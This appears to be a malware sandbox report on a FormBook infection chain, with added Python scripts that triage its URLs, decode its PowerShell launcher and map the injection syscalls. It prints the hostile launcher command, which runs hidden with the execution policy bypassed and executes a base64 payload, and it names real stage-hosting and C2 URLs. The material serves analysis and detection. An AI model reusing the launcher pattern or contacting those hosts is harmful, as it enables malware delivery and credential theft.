Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49724
Source: unknown HTTPS traffic detected: 207.241.227.242:443 -> 192.168.2.6:49711 version: TLS 1.2
Source: unknown HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.6:49724 version: TLS 1.2
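The string list above mixes three very different kinds of URL: module and framework strings that powershell.exe loads on any host (Pester, NuGet/OneGet, contoso.com placeholders, Apache licence links), browser search-provider and Microsoft-account URLs that sit in dllhost.exe memory (most likely because the injected stealer code reads browser profile data, which is an inference here, not something the report states), and the handful of hosts that actually matter for this sample: paste.ee and archive.org as stage hosting, and airgame.store, gamesfunny.top and playchill.top as candidate C2. The script below is an added example, not part of the sandbox report, that applies that split to a subset of the lines copied from the list above. The benign and abused-hosting domain sets are my own allowlists and will need tuning for other samples.

```python
"""Sort the report's in-memory URL strings into noise, stage hosting and candidate C2."""
import re
from collections import defaultdict
from urllib.parse import urlsplit

# Subset of the report's "String found in binary or memory" lines, copied as they appear above.
REPORT_LINES = r"""
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7550000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000004.00000002.2282559489.000001FEB5CC0000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA606D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://paste.ee/d/mFPBh/0
Source: powershell.exe, 00000004.00000002.2265097583.000001FEA7002000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: https://ia600102.us.archive.org/32/items/detah-note-v_202410/DetahNote_V.jpg
Source: QEwzeZKCXN.exe, 0000000C.00000002.3413713122.000000000549C000.00000040.80000000.00040000.00000000.sdmp String found in binary or memory: http://www.airgame.store/ojib/
Source: dllhost.exe, 0000000B.00000003.2926064514.0000000007F68000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: dllhost.exe, 0000000B.00000002.3410035281.00000000033CF000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
Source: dllhost.exe, 0000000B.00000002.3413640023.00000000046AA000.00000004.10000000.00040000.00000000.sdmp, QEwzeZKCXN.exe, 0000000C.00000002.3412271130.000000000384A000.00000004.00000001.00040000.00000000.sdmp String found in binary or memory: https://playchill.top/api/axgames/request?domain=$
""".strip().splitlines()

LINE = re.compile(r"^Source:\s+(?P<sources>.+?)\s+String found in binary or memory:\s+(?P<url>\S+)$")

# Allowlist (my assumption, tune per environment): PowerShell/.NET tooling strings,
# browser default search providers and Microsoft account endpoints, and generic web assets.
BENIGN_DOMAINS = {
    "pesterbdd.com", "github.com", "nuget.org", "oneget.org", "contoso.com", "aka.ms",
    "schemas.xmlsoap.org", "apache.org", "go.micro",
    "duckduckgo.com", "ecosia.org", "yahoo.com", "google.com", "gstatic.com",
    "googleapis.com", "googleusercontent.com", "live.com",
    "cloudflare.com", "gravatar.com", "jquery.com", "doubleclick.net",
}
# Legitimate services routinely abused to host second stages; worth blocking the exact URL, not the domain.
ABUSED_HOSTING = {"paste.ee", "archive.org"}


def _host_matches(host: str, domain: str) -> bool:
    return host == domain or host.endswith("." + domain)


def classify(url: str) -> str:
    """Return 'noise', 'stage hosting' or 'candidate C2' for one URL string."""
    host = (urlsplit(url).hostname or "").lower()
    if any(_host_matches(host, d) for d in BENIGN_DOMAINS):
        return "noise"
    if any(_host_matches(host, d) for d in ABUSED_HOSTING):
        return "stage hosting"
    return "candidate C2"


def triage(lines):
    """Bucket every URL line by category, keeping the processes whose memory held it."""
    buckets = defaultdict(list)
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        procs = sorted(set(re.findall(r"\b[\w-]+\.exe\b", m.group("sources"))))
        buckets[classify(m.group("url"))].append((m.group("url"), procs))
    return dict(buckets)


if __name__ == "__main__":
    for category, items in triage(REPORT_LINES).items():
        print(category)
        for url, procs in items:
            print("   ", url, "  <-", ", ".join(procs))
```

Two things the grouping makes visible: the candidate C2 strings live in QEwzeZKCXN.exe and dllhost.exe (the injected processes), never in powershell.exe, and the only URLs in powershell.exe that are not tooling noise are the two stage-hosting downloads, which matches the loader-then-payload shape of the process tree.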

E-Banking Fraud

Source: Yara match File source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 5.2.appidtel.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 5.2.appidtel.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2743518891.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3411918505.0000000003580000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2744370490.0000000003750000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000C.00000002.3413713122.00000000053E0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3409933313.0000000003330000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 00000005.00000002.2743702515.0000000000B20000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000B.00000002.3409365866.0000000003080000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: 0000000A.00000002.3412088432.0000000002DF0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY Matched rule: Windows_Trojan_Formbook_1112e116 Author: unknown
Source: Process Memory Space: powershell.exe PID: 6568, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 1492, type: MEMORYSTR Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\System32\wscript.exe COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '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';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
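The process-creation line above is the whole loader in one command: wscript.exe starts powershell.exe with a base64 literal in $Codigo, decodes it with [Convert]::FromBase64String plus UTF8.GetString, and hands the result to a second, hidden powershell.exe with the execution policy bypassed and the profile suppressed. The base64 literal itself is redacted on this page. The following is an added example, not code from the report, that recovers the inner script from a command line of that shape and lists the switches that make it worth alerting on. The sample command line and its inner script are constructed to mirror the report's pattern; the evasion list and the two-switch threshold are my own choices.

```python
"""Triage a wscript -> powershell launcher of the shape shown in the process-creation line above."""
import base64
import re

# Constructed stand-in for the redacted inner script; the real base64 literal is not on the page.
SECOND_STAGE = "Start-Sleep -Seconds 1; Write-Output 'stage two'"
SAMPLE_CMDLINE = (
    '"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe" -command '
    "$Codigo = '" + base64.b64encode(SECOND_STAGE.encode("utf-8")).decode("ascii") + "';"
    "$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));"
    "powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD"
)

# A $name = '<base64>' literal, the call that decodes it, and the -EncodedCommand/-enc form.
B64_LITERAL = re.compile(r"\$(\w+)\s*=\s*'([A-Za-z0-9+/=]{16,})'")
DECODE_CALL = re.compile(r"FromBase64String\(\s*\$(\w+)\s*\)", re.IGNORECASE)
ENC_FLAG = re.compile(r"-e(?:nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.IGNORECASE)

# Switches that are harmless alone but rarely appear together outside of loaders (my list).
EVASION = {
    "-windowstyle hidden": "hidden window",
    "-executionpolicy bypass": "execution policy bypass",
    "-noprofile": "profile suppressed",
    "frombase64string": "inline base64 payload",
}


def _decode(blob: str, encoding: str):
    """Base64-decode and interpret as text; None if the blob is invalid or not text."""
    try:
        return base64.b64decode(blob, validate=True).decode(encoding)
    except (ValueError, UnicodeDecodeError):
        return None


def encode_for_enc(script: str) -> str:
    """Build the argument PowerShell expects after -EncodedCommand (UTF-16LE, then base64)."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def extract_stage(cmdline: str) -> dict:
    """Recover the inline payload and list the evasion switches on the command line.

    Two encodings are handled: a literal run through [Convert]::FromBase64String and
    UTF8.GetString (UTF-8, the pattern in this report), and -EncodedCommand/-enc,
    which PowerShell always decodes as UTF-16LE.
    """
    lower = cmdline.lower()
    flags = [label for needle, label in EVASION.items() if needle in lower]
    if lower.count("powershell.exe") >= 2:
        flags.append("nested powershell launch")

    variable, decoded = None, None
    literals = {name.lower(): blob for name, blob in B64_LITERAL.findall(cmdline)}
    call = DECODE_CALL.search(cmdline)
    if call and call.group(1).lower() in literals:
        # Variable names are case-insensitive in PowerShell, so $Codigo and $codigo are one variable.
        variable = call.group(1)
        decoded = _decode(literals[variable.lower()], "utf-8")
    else:
        enc = ENC_FLAG.search(cmdline)
        if enc:
            variable = "-EncodedCommand"
            decoded = _decode(enc.group(1), "utf-16-le")
    return {"variable": variable, "decoded": decoded, "flags": flags}


def is_suspicious(cmdline: str) -> bool:
    """Alert when a payload decodes and at least two evasion switches accompany it."""
    result = extract_stage(cmdline)
    return result["decoded"] is not None and len(result["flags"]) >= 2


if __name__ == "__main__":
    result = extract_stage(SAMPLE_CMDLINE)
    print("variable:", result["variable"])
    print("flags   :", ", ".join(result["flags"]))
    print("payload :", result["decoded"])
```

The UTF-8 versus UTF-16LE distinction is the usual trap when decoding these by hand: a literal that goes through UTF8.GetString decodes as plain text, while anything passed to -EncodedCommand comes out as alternating NUL bytes unless it is read as UTF-16LE.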
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0042C283 NtClose, 5_2_0042C283
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk, 5_2_032835C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282B60 NtClose,LdrInitializeThunk, 5_2_03282B60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DF0 NtQuerySystemInformation,LdrInitializeThunk, 5_2_03282DF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C70 NtFreeVirtualMemory,LdrInitializeThunk, 5_2_03282C70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03284340 NtSetContextThread, 5_2_03284340
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283010 NtOpenDirectoryObject, 5_2_03283010
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283090 NtSetValueKey, 5_2_03283090
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03284650 NtSuspendThread, 5_2_03284650
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BA0 NtEnumerateValueKey, 5_2_03282BA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282B80 NtQueryInformationFile, 5_2_03282B80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BE0 NtQueryValueKey, 5_2_03282BE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BF0 NtAllocateVirtualMemory, 5_2_03282BF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AB0 NtWaitForSingleObject, 5_2_03282AB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AF0 NtWriteFile, 5_2_03282AF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282AD0 NtReadFile, 5_2_03282AD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032839B0 NtGetContextThread, 5_2_032839B0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F30 NtCreateSection, 5_2_03282F30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F60 NtCreateProcessEx, 5_2_03282F60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FA0 NtQuerySection, 5_2_03282FA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FB0 NtResumeThread, 5_2_03282FB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F90 NtProtectVirtualMemory, 5_2_03282F90
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FE0 NtCreateFile, 5_2_03282FE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282E30 NtWriteVirtualMemory, 5_2_03282E30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282EA0 NtAdjustPrivilegesToken, 5_2_03282EA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282E80 NtReadVirtualMemory, 5_2_03282E80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282EE0 NtQueueApcThread, 5_2_03282EE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D30 NtUnmapViewOfSection, 5_2_03282D30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D00 NtSetInformationFile, 5_2_03282D00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283D10 NtOpenProcessToken, 5_2_03283D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D10 NtMapViewOfSection, 5_2_03282D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03283D70 NtOpenThread, 5_2_03283D70
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DB0 NtEnumerateKey, 5_2_03282DB0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282DD0 NtDelayExecution, 5_2_03282DD0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C00 NtQueryInformationProcess, 5_2_03282C00
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282C60 NtCreateKey, 5_2_03282C60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CA0 NtQueryInformationToken, 5_2_03282CA0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CF0 NtOpenProcess, 5_2_03282CF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CC0 NtQueryVirtualMemory, 5_2_03282CC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03854340 NtSetContextThread,LdrInitializeThunk, 11_2_03854340
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03854650 NtSuspendThread,LdrInitializeThunk, 11_2_03854650
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038535C0 NtCreateMutant,LdrInitializeThunk, 11_2_038535C0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852B60 NtClose,LdrInitializeThunk, 11_2_03852B60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AD0 NtReadFile,LdrInitializeThunk, 11_2_03852AD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AF0 NtWriteFile,LdrInitializeThunk, 11_2_03852AF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_038539B0 NtGetContextThread,LdrInitializeThunk, 11_2_038539B0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FB0 NtResumeThread,LdrInitializeThunk, 11_2_03852FB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FE0 NtCreateFile,LdrInitializeThunk, 11_2_03852FE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F30 NtCreateSection,LdrInitializeThunk, 11_2_03852F30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852EE0 NtQueueApcThread,LdrInitializeThunk, 11_2_03852EE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DD0 NtDelayExecution,LdrInitializeThunk, 11_2_03852DD0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DF0 NtQuerySystemInformation,LdrInitializeThunk, 11_2_03852DF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D10 NtMapViewOfSection,LdrInitializeThunk, 11_2_03852D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D30 NtUnmapViewOfSection,LdrInitializeThunk, 11_2_03852D30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CA0 NtQueryInformationToken,LdrInitializeThunk, 11_2_03852CA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C60 NtCreateKey,LdrInitializeThunk, 11_2_03852C60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C70 NtFreeVirtualMemory,LdrInitializeThunk, 11_2_03852C70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853090 NtSetValueKey, 11_2_03853090
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853010 NtOpenDirectoryObject, 11_2_03853010
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852B80 NtQueryInformationFile, 11_2_03852B80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BA0 NtEnumerateValueKey, 11_2_03852BA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BE0 NtQueryValueKey, 11_2_03852BE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BF0 NtAllocateVirtualMemory, 11_2_03852BF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852AB0 NtWaitForSingleObject, 11_2_03852AB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F90 NtProtectVirtualMemory, 11_2_03852F90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FA0 NtQuerySection, 11_2_03852FA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F60 NtCreateProcessEx, 11_2_03852F60
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852E80 NtReadVirtualMemory, 11_2_03852E80
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852EA0 NtAdjustPrivilegesToken, 11_2_03852EA0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852E30 NtWriteVirtualMemory, 11_2_03852E30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852DB0 NtEnumerateKey, 11_2_03852DB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852D00 NtSetInformationFile, 11_2_03852D00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853D10 NtOpenProcessToken, 11_2_03853D10
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03853D70 NtOpenThread, 11_2_03853D70
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CC0 NtQueryVirtualMemory, 11_2_03852CC0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CF0 NtOpenProcess, 11_2_03852CF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852C00 NtQueryInformationProcess, 11_2_03852C00
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A9190 NtClose, 11_2_030A9190
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A90F0 NtDeleteFile, 11_2_030A90F0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A8FF0 NtReadFile, 11_2_030A8FF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_030A8E80 NtCreateFile, 11_2_030A8E80
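The Nt* lines above are the report's evidence for the injection signatures (writes to foreign memory, APC queueing, thread-context modification, section mapping) and for the direct/indirect syscall finding: both appidtel.exe (process 5) and dllhost.exe (process 11) reference the raw NT functions rather than the Win32 wrappers. The script below is an added example, not part of the report, that parses a subset of those lines (copied from above) and maps each process's Nt* references onto the stages of a remote-injection chain and onto the set that distinguishes process hollowing. The stage groupings are my own; the first field of the `5_2_` / `11_2_` prefix is read as the process number the report uses elsewhere (5.2.appidtel.exe, 0000000B for dllhost.exe), and the `LdrInitializeThunk` tag is carried through without interpretation because the page does not explain it.

```python
"""Map the Nt* references the report lists per process onto the stages of an injection chain."""
import re
from collections import defaultdict

# Copied from the 'Code function' lines above (a subset; the full list is much longer).
REPORT_LINES = r"""
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_032835C0 NtCreateMutant,LdrInitializeThunk, 5_2_032835C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282CF0 NtOpenProcess, 5_2_03282CF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282BF0 NtAllocateVirtualMemory, 5_2_03282BF0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D10 NtMapViewOfSection, 5_2_03282D10
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282D30 NtUnmapViewOfSection, 5_2_03282D30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282E30 NtWriteVirtualMemory, 5_2_03282E30
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F60 NtCreateProcessEx, 5_2_03282F60
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282F90 NtProtectVirtualMemory, 5_2_03282F90
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282EE0 NtQueueApcThread, 5_2_03282EE0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03284340 NtSetContextThread, 5_2_03284340
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_03282FB0 NtResumeThread, 5_2_03282FB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03854340 NtSetContextThread,LdrInitializeThunk, 11_2_03854340
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852FB0 NtResumeThread,LdrInitializeThunk, 11_2_03852FB0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852EE0 NtQueueApcThread,LdrInitializeThunk, 11_2_03852EE0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852BF0 NtAllocateVirtualMemory, 11_2_03852BF0
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852E30 NtWriteVirtualMemory, 11_2_03852E30
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852F90 NtProtectVirtualMemory, 11_2_03852F90
Source: C:\Windows\SysWOW64\dllhost.exe Code function: 11_2_03852CF0 NtOpenProcess, 11_2_03852CF0
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347751FA 4_2_00007FFD347751FA
""".strip().splitlines()

# <image> Code function: <proc>_<phase>_<addr> <Api,Api,...> <proc>_<phase>_<addr>
LINE = re.compile(
    r"^Source:\s+(?P<image>\S+)\s+Code function:\s+"
    r"(?P<proc>\d+)_(?P<phase>\d+)_(?P<addr>[0-9A-Fa-f]+)\s+(?P<apis>(?:\w+,)*)"
)

# Stages of a remote-injection chain expressed as NT syscalls (my grouping).
PRIMITIVES = {
    "open target": {"NtOpenProcess", "NtOpenThread", "NtCreateProcessEx"},
    "allocate or map memory": {"NtAllocateVirtualMemory", "NtMapViewOfSection", "NtCreateSection"},
    "write payload": {"NtWriteVirtualMemory"},
    "change protection": {"NtProtectVirtualMemory"},
    "hijack execution": {"NtQueueApcThread", "NtSetContextThread", "NtResumeThread"},
}
# Hollowing additionally needs a suspended child whose image gets unmapped and replaced.
HOLLOWING = {"NtUnmapViewOfSection", "NtCreateProcessEx", "NtWriteVirtualMemory",
             "NtSetContextThread", "NtResumeThread"}


def parse(lines):
    """Yield (image, process number, address, [api names]) for each 'Code function' line."""
    for line in lines:
        m = LINE.match(line.strip())
        if not m:
            continue
        apis = [a for a in m.group("apis").split(",") if a]
        yield m.group("image"), int(m.group("proc")), m.group("addr"), apis


def injection_summary(lines):
    """Group Nt* references by process and report which injection stages each one covers."""
    per_proc = defaultdict(lambda: {"image": None, "apis": set(), "ldr_tagged": set()})
    for image, proc, _addr, apis in parse(lines):
        entry = per_proc[proc]
        entry["image"] = image
        nt_apis = [a for a in apis if a.startswith("Nt")]
        entry["apis"].update(nt_apis)
        if "LdrInitializeThunk" in apis:
            entry["ldr_tagged"].update(nt_apis)
    summary = {}
    for proc, entry in per_proc.items():
        stages = [name for name, needles in PRIMITIVES.items() if entry["apis"] & needles]
        summary[proc] = {
            "image": entry["image"],
            "stages": stages,
            "full_chain": len(stages) == len(PRIMITIVES),
            "hollowing": HOLLOWING <= entry["apis"],
            "ldr_tagged": sorted(entry["ldr_tagged"]),
        }
    return summary


if __name__ == "__main__":
    for proc, info in sorted(injection_summary(REPORT_LINES).items()):
        print(proc, info["image"])
        print("   stages    :", ", ".join(info["stages"]) or "none")
        print("   full chain:", info["full_chain"], " hollowing:", info["hollowing"])
        print("   ldr-tagged:", ", ".join(info["ldr_tagged"]) or "none")
```

On the subset above, appidtel.exe covers every stage and the hollowing set (it is where the unpacked FormBook first runs and spawns its next host), dllhost.exe covers every stage but lacks the hollowing-specific calls, and the powershell.exe entry has no Nt* references at all, which is the expected split between the loader and the injected payload.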
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347751FA 4_2_00007FFD347751FA
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347729C5 4_2_00007FFD347729C5
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34774311 4_2_00007FFD34774311
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772745 4_2_00007FFD34772745
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772ED3 4_2_00007FFD34772ED3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347767F3 4_2_00007FFD347767F3
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34772BFB 4_2_00007FFD34772BFB
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD347757B2 4_2_00007FFD347757B2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 4_2_00007FFD34842FC9 4_2_00007FFD34842FC9
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004182B3 5_2_004182B3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00413023 5_2_00413023
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0042E8B3 5_2_0042E8B3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_004011C0 5_2_004011C0
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040234D 5_2_0040234D
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00402350 5_2_00402350
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040FB83 5_2_0040FB83
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041644C 5_2_0041644C
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0041648E 5_2_0041648E
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00416493 5_2_00416493
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040FDA3 5_2_0040FDA3
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040DE19 5_2_0040DE19
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0040DE23 5_2_0040DE23
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_00402E80 5_2_00402E80
Source: C:\Windows\SysWOW64\appidtel.exe Code function: 5_2_0330132D 5_2_0330132D
